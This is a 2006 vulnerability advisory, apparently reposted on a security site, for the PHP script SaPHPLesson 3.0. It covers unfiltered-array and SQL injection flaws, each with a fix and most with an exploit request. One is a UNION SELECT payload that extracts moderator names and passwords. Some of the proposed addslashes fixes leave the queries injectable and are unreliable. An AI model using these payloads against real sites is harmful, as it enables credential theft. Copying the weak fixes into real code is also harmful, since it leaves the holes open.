SaPHPLesson 3.0 Multbugs

2006.05.10
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --: 1- Unfilter array Filename :- show.php Line :- 102 [code] $hrow[] = $Row2;[/code] Fix :- Add To Line [ 11 ] /show.php This Code :- we add the code to global to fix all unfilter ver. at the code :) [code] $hrow = array();[/code] Exploit :- GET ^ /lessons/show.php?lessid=1&hrow=D3vil-0x1 /---------------------------------------------------------/ 2- Unfilter array Filename :- showcat.php Line :- 80 [code] $Lsnrow[] = $Row;[/code] Fix :- Add To Line [ 11 ] /showcat.php This Code :- we add the code to global to fix all unfilter ver. at the code :) [code] $Lsnrow = array();[/code] Exploit :- GET ^ /lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1 /---------------------------------------------------------/ 3- SQL Injection Filename :- search.php Line :- MultLines Fix :- Line 28 Replace It With [code] $Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code] Line 32 Replace It With [code] $Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code] Exploit :- POST ^ Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,nu ll,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC /---------------------------------------------------------/ 4- SQL Injection Filename :- misc.php Line :- 64 Fix :- Replace Line 62 & 63 With This Code [code] $LID = intval($_GET["LID"]); $Rate = intval($_POST["Rate"]);[/code] /---------------------------------------------------------/ 5- Unfilter array Filename :- index.php Line :- 24 [code] $rows[] = $Row;[/code] Fix :- Add To Line [ 11 ] /index.php This Code :- we add the code to global to fix all unfilter ver. at the code :) [code] $rows = array(); $hrow = array();[/code] Exploit :- GET ^ /saphplesson/index.php?rows=D3vil-x01


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top